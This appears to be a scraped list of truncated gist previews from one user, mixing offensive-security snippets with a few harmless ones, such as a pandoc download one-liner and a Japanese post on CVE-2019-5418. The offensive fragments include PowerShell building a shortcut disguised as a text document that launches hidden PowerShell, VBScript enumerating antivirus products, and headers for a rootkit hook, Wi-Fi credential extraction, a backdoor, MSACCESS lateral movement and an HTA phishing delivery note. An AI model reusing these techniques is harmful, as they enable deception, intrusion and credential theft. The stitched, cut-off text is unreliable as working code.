sasqwatch

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

sasqwatch

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk")
$ShortCut.Arguments = " -W 1 -command ....."
$ShortCut.TargetPath = "powershell"
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0";
$ShortCut.Description = "Type: Text Document";
$ShortCut.Save()

sasqwatch

Function Base64Encode(sText)
  dim DM, EL
  Set DM = CreateObject("Microsoft.XMLDOM")
  Set EL = DM.createElement("tmp")
  EL.DataType = "bin.base64"
  EL.NodeTypedValue = sText
  Base64Encode = EL.Text
End Function
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct")

sasqwatch

  #====================================#
  # Extract Wi-Fi Credentials          #
  # greg . foss @ owasp . org          #
  # v0.1  --  July, 2017               #
  #====================================#
  
# Licensed under the MIT License

<#

sasqwatch

function Get-InterfaceTree
{
    <#
    .SYNOPSIS
        Displays a tree of interfaces for a given type
    .DESCRIPTION
        Recursively runs the "GetInterfaces() method on a type and its interfaces to build a picture of all the interfaces that are applied to a type"
    .EXAMPLE
        PS C:\> Get-InterfaceTree hashtable
        

sasqwatch

Rails の CVE-2019-5418 は RCE (Remote code execution) です

前置き

• これは休日に書いた記事で所属している組織とは一切の関係がない。

概要

• CVE-2019-5418 は実際のところ高確率でRCEなのだが File Content Disclosure という聞き慣れない名前で公表されて、CVE-2019-5419 で DoSが出来るという内容になっている
• やあ、脆弱性の開示方法というのは実際に難しい問題だ、広範に使われていて影響範囲が甚大になるようなソフトウェアの脆弱性となると、具体的な攻撃コードを載せるなと言う人が多いのはよく分かる。
• しかしながら、影響範囲についてまでも、不正確な記述がされてしまっている。これは悪い傾向だと自分は思う。これは配慮の結果なのか？ それとも無知の結果か？

sasqwatch

From the inside out, a minimalist backdoor. 

I'm a pretty big fan of simple, and elegant.  In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.

We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel

While I have a full compact, custom version, I will not release this.  

sasqwatch

<#
    Lateral Movement Via MSACCESS TransformXML
    Author: Philip Tsukerman (@PhilipTsukerman)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
#>

function Invoke-AccessXSLT {
<#

sasqwatch

• Use curl to get the JSON response for the latest release
• Use grep to find the line containing file URL
• Use cut and tr to extract the URL
• Use wget to download it

curl -s https://api.github.com/repos/jgm/pandoc/releases/latest \
| grep "browser_download_url.*deb" \
| cut -d : -f 2,3 \
| tr -d \" \

sasqwatch

<#
  Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
  To change your server, simply find and replace 192.168.1.1 with your server in the code.
  
#>

<#
	Moving Credtis for CACTUSTORCH HERE
	I was in escape sequcence hell ;-) 
	'                                (              )  (            )